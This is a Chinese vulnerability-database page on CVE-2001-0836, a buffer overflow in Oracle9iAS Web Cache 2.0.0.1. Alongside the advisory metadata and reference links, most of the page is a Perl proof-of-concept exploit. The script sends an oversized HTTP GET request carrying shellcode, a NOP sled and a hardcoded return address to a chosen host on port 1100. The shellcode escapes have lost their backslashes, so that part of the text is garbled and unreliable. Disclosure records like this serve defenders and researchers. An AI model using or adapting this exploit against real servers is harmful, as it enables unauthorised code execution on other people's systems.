Oracle9iAS Web Cache代码执行漏洞

Oracle9iAS Web Cache代码执行漏洞

漏洞ID 1106505 漏洞类型 缓冲区溢出
发布时间 2001-10-18 更新时间 2005-05-02
图片[1]-Oracle9iAS Web Cache代码执行漏洞-安全小百科CVE编号 CVE-2001-0836
图片[2]-Oracle9iAS Web Cache代码执行漏洞-安全小百科CNNVD-ID CNNVD-200112-071
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-071
|漏洞详情
Oracle9iASWebCache2.0.0.1存在缓冲区溢出漏洞。远程攻击者可以借助超长HTTPGET请求执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/3443/info

A buffer overflow condition can be triggered in Oracle 9iAS Web Cache 2.0.0.1.0 by submitting a malicious URL. This overflow can lead to either the process exiting, the process hanging, or the injection of malicious code. This occurs on all four services provided by Web Cache.

While this vulnerability has been addressed in Oracle 91AS Web Cache 2.0.0.2.0, it has been reported that versions for Microsoft Windows NT are still vulnerable.

#!perl
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:defcom.iyd
# By [email protected] (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
        print "Usage: $0 <host>n";
        print "Example: $0 127.0.0.1n";
        exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "xebx03x5axebx05xe8xf8xffxffxffx8bxecx8bxc2x83xc0x18x33xc9";
$sploit=$sploit . "x66xb9xb3x80x66x81xf1x80x80x80x30x99x40xe2xfaxaax59";
$sploit=$sploit . "xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1ax5bxa4";
$sploit=$sploit . "xcbx27x51x99xd5x99x66x8fxaax59xc9x27x09x98xd5x99x66";
$sploit=$sploit . "x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";
$msg = "GET " . $sploit . "x90" x (3096 - length($sploit)) . "xe8xf1xc5x05" . " HTTP/1.0nn";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
|参考资料

来源:US-CERTVulnerabilityNote:VU#649979
名称:VU#649979
链接:http://www.kb.cert.org/vuls/id/649979
来源:CERT/CCAdvisory:CA-2001-29
名称:CA-2001-29
链接:http://www.cert.org/advisories/CA-2001-29.html
来源:BUGTRAQ
名称:20011024Oracle9iASWebCacheOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100395487007578&w;=2
来源:BUGTRAQ
名称:20011018def-2001-30
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100342151132277&w;=2
来源:otn.oracle.com
链接:http://otn.oracle.com/deploy/security/pdf/webcache.pdf
来源:XF
名称:oracle-appserver-http-bo(7306)
链接:http://xforce.iss.net/static/7306.php
来源:OSVDB
名称:5534
链接:http://www.osvdb.org/5534

相关推荐: VMware ESX Server以root权限执行任意程序漏洞

VMware ESX Server以root权限执行任意程序漏洞 漏洞ID 1202164 漏洞类型 未知 发布时间 2003-12-31 更新时间 2003-12-31 CVE编号 CVE-2003-1291 CNNVD-ID CNNVD-200312-29…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享